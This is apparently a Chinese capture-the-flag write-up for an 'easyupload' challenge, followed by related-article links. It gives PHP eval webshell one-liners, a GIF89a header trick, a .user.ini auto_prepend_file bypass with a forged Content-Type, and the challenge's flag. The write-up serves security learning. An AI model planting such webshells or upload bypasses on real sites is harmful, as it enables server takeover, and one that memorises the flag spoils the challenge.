CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
ejinxian21 分钟前
PHP 超文本预处理器 发布 8.5 版本
开发语言·php
zorro_z2 小时前
PHP语法基础篇(九):正则表达式
php
SuperherRo12 小时前
WEB攻防-文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
php·文件包含·伪协议·lfi·无文件·黑白盒·rfi
游戏开发爱好者814 小时前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习16 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
A5rZ20 小时前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
用户Taobaoapi20141 天前
Taobao agent USA丨美国淘宝代购1688代采集运系统搭建指南
数据挖掘·php
蓝色记忆1 天前
Classmap 如何兼容旧代码
php
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013741 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp